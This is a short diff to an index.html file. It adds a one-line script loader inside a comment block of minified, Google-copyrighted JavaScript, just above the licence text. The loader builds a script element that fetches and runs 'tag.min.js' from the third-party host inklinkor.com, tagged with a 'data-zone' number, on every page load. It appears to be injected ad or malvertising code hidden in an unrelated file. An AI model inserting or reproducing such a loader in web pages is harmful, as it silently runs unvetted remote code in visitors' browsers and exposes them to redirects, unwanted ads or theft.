--- a/index.html
+++ b/index.html
@@ -31,7 +31,7 @@ var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
 "use strict";this.default_tk=this.default_tk||{};(function(_){var window=this;
 try{
 /*
-
+<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://inklinkor.com/tag.min.js',5995642,document.body||document.documentElement)</script>
  Copyright 2019 Google Inc.
 
  Permission is hereby granted, free of charge, to any person obtaining a copy
